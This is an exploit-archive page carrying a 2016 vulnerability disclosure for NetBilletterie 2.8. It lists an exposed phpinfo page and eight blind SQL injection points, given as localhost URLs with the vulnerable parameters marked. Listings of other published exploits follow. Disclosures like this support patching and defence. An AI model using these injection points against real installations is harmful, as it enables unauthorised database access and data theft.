Menu

Search for hundreds of thousands of exploits

"NetBilletterie 2.8 - Multiple Vulnerabilities"

Author

Exploit author

Wadeek

Platform

Exploit platform

php

Release date

Exploit published date

2016-10-12

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Exploit Title: NetBilletterie 2.8 | Multiple Vulnerabilities
# Date: 14/07/16
# Exploit Author: Wadeek
# Website Author: https://github.com/Wad-Deek
# Vendor Homepage: http://net-billetterie.tuxfamily.org/
# Software Link: https://sourceforge.net/projects/netbilletterie/files/
# Demo Link: http://net-billetterie.tuxfamily.org/NetBilletterieDemo/login.inc.php
# Version: 2.8
# Tested on: Xampp on Windows7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools

[phpinfo()]
################################################################
(200) => http://localhost/netbilletterie/php_info.php
################################################################

[6 SQL Injection (Type: time-based blind)]
################################################################
(200) => http://localhost/netbilletterie/lister_detail_bon.php?date_debut=*
(200) => http://localhost/netbilletterie/lister_pointes_ok.php?date_debut=*
(302) => http://localhost/netbilletterie/delete_article.php?article=*
(302) => http://localhost/netbilletterie/delete_banque.php?id_banque=*
(302) => http://localhost/netbilletterie/delete_tarif.php?id_tarif=*
(302) => http://localhost/netbilletterie/del_client.php?num=*
################################################################

[2 SQL Injection (Type: boolean-based blind)]
################################################################
(200) => http://localhost/netbilletterie/fpdf/liste_spectateurs.php?article=*
(200) => http://localhost/netbilletterie/fpdf/liste_spectateurs_attente.php?article=*
################################################################
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-04-14 "Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution" webapps hardware Wadeek
2019-07-15 "NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass" webapps hardware Wadeek
2018-11-12 "TP-Link Archer C50 Wireless Router 171227 - Cross-Site Request Forgery (Configuration File Disclosure)" webapps hardware Wadeek
2018-10-30 "NETGEAR WiFi Router R6120 - Credential Disclosure" webapps hardware Wadeek
2018-08-09 "TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Information Disclosure)" webapps hardware Wadeek
2018-08-09 "TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)" webapps hardware Wadeek
2018-06-25 "AsusWRT RT-AC750GF - Cross-Site Request Forgery (Change Admin Password)" webapps hardware Wadeek
2018-04-26 "WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion" webapps php Wadeek
2018-04-26 "TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Remote Reboot" webapps hardware Wadeek
2018-02-19 "Aastra 6755i SIP SP4 - Denial of Service" dos hardware Wadeek
2018-01-17 "Belkin N600DB Wireless Router - Multiple Vulnerabilities" webapps hardware Wadeek
2017-07-17 "Belkin F7D7601 NetCam - Multiple Vulnerabilities" remote hardware Wadeek
2016-10-24 "EC-CUBE 2.12.6 - Server-Side Request Forgery" webapps php Wadeek
2016-10-12 "NetBilletterie 2.8 - Multiple Vulnerabilities" webapps php Wadeek
2016-10-12 "OpenCimetiere 3.0.0-a5 - Blind SQL Injection" webapps php Wadeek
2016-10-12 "Categorizator 0.3.1 - SQL Injection" webapps php Wadeek
2016-03-21 "WordPress Plugin Import CSV 1.0 - Directory Traversal" webapps php Wadeek
2016-03-21 "WordPress Plugin eBook Download 1.1 - Directory Traversal" webapps php Wadeek
2016-03-14 "WordPress Plugin Site Import 1.0.1 - Local/Remote File Inclusion" webapps php Wadeek
2015-05-18 "Chronosite 5.12 - SQL Injection" webapps php Wadeek
2015-05-13 "PHPCollab 2.5 - 'deletetopics.php' SQL Injection" webapps php Wadeek
2015-05-11 "Pluck CMS 4.7 - Directory Traversal" webapps php Wadeek
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.